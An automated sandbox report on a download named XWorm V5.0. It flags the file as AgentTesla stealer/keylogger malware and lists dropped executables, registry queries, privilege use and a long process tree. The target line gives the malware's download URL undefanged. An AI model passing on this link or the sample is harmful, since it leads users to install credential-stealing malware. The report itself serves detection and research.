agenttesla | hxxps://www[.]upload[.]ee/download/15657107/813ac1d2bfa81d7f177e/XWorm-V5[.]0[.]rar

Analysis

max time kernel
357s
max time network
369s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
12-04-2024 11:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.upload.ee/download/15657107/813ac1d2bfa81d7f177e/XWorm-V5.0.rar

Score

10^/10

agenttesla agilenet keylogger spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

AgentTesla payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\XWorm-V5.0\Guna.UI2.dll	family_agenttesla
behavioral1/memory/2152-393-0x000001F1A7360000-0x000001F1A7554000-memory.dmp	family_agenttesla

Executes dropped EXE 4 IoCs

Processes:

XWorm V5.0.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exe

pid process

2152 XWorm V5.0.exe
2560 $sxr-mshta.exe
4580 $sxr-cmd.exe
1480 $sxr-powershell.exe
Loads dropped DLL 1 IoCs

Processes:

XWorm V5.0.exe

pid process

2152 XWorm V5.0.exe

pid	process
2152	XWorm V5.0.exe
2560	$sxr-mshta.exe
4580	$sxr-cmd.exe
1480	$sxr-powershell.exe

pid	process
2152	XWorm V5.0.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\XWorm-V5.0\XWorm V5.0.exe	agile_net
behavioral1/memory/2152-372-0x000001F18AC10000-0x000001F18B682000-memory.dmp	agile_net

Drops file in Windows directory 6 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\$sxr-powershell.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	powershell.exe
File created	C:\Windows\$sxr-mshta.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	powershell.exe
File created	C:\Windows\$sxr-cmd.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-cmd.exe	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

XWorm V5.0.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XWorm V5.0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XWorm V5.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XWorm V5.0.exe

Modifies registry class 3 IoCs

Processes:

OpenWith.exemsedge.exe$sxr-mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-160263616-143223877-1356318919-1000\{0208293E-3748-4277-8185-0F1CAD484E09}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	$sxr-mshta.exe

NTFS ADS 3 IoCs

Processes:

msedge.exemsedge.exemsedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\XWorm-V5.0.rar:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\XWorm-V5.6-Cracked-main.zip:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

Processes:

msedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exepowershell.exe$sxr-powershell.exe

pid	process
4804	msedge.exe
4804	msedge.exe
2160	msedge.exe
2160	msedge.exe
2432	msedge.exe
2432	msedge.exe
1960	identity_helper.exe
1960	identity_helper.exe
968	msedge.exe
968	msedge.exe
4736	msedge.exe
4736	msedge.exe
3248	msedge.exe
3248	msedge.exe
3248	msedge.exe
3248	msedge.exe
4648	msedge.exe
4648	msedge.exe
1992	msedge.exe
1992	msedge.exe
3920	powershell.exe
3920	powershell.exe
3920	powershell.exe
3920	powershell.exe
3920	powershell.exe
3920	powershell.exe
3920	powershell.exe
1480	$sxr-powershell.exe
1480	$sxr-powershell.exe
1480	$sxr-powershell.exe
1480	$sxr-powershell.exe
1480	$sxr-powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

7zFM.exe

pid process

3952 7zFM.exe

pid	process
3952	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 36 IoCs

Processes:

msedge.exe

pid	process
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

7zFM.exeXWorm V5.0.exeAUDIODG.EXEpowershell.exe$sxr-powershell.exe

description	pid	process
Token: SeRestorePrivilege	3952	7zFM.exe
Token: 35	3952	7zFM.exe
Token: SeSecurityPrivilege	3952	7zFM.exe
Token: SeDebugPrivilege	2152	XWorm V5.0.exe
Token: 33	2692	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2692	AUDIODG.EXE
Token: SeDebugPrivilege	3920	powershell.exe
Token: SeDebugPrivilege	3920	powershell.exe
Token: SeDebugPrivilege	3920	powershell.exe
Token: SeDebugPrivilege	1480	$sxr-powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

OpenWith.exe

pid process

4656 OpenWith.exe

pid	process
4656	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 2160 wrote to memory of 2076	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 2076	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3364	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 4804	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 4804	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe
PID 2160 wrote to memory of 3444	2160	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.upload.ee/download/15657107/813ac1d2bfa81d7f177e/XWorm-V5.0.rar
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9ac2f3cb8,0x7ff9ac2f3cc8,0x7ff9ac2f3cd8
2⤵
PID:2076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1872 /prefetch:2
2⤵
PID:3364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
2⤵
PID:3444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
2⤵
PID:3632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
2⤵
PID:1808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
2⤵
PID:968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
2⤵
PID:4628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
2⤵
PID:3508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
2⤵
PID:4172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
2⤵
PID:2120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
2⤵
PID:3400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
2⤵
PID:4500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
2⤵
PID:4952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3308 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:1
2⤵
PID:3048

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
2⤵
PID:2008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
2⤵
PID:1124

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
2⤵
PID:3460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
2⤵
PID:1580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1
2⤵
PID:3840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
2⤵
PID:3516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6884 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
2⤵
PID:2272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:1
2⤵
PID:4456

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
2⤵
PID:880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
2⤵
PID:1668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6460 /prefetch:1
2⤵
PID:3280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
2⤵
PID:2556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
2⤵
PID:1412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4812 /prefetch:8
2⤵
PID:2828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6948 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
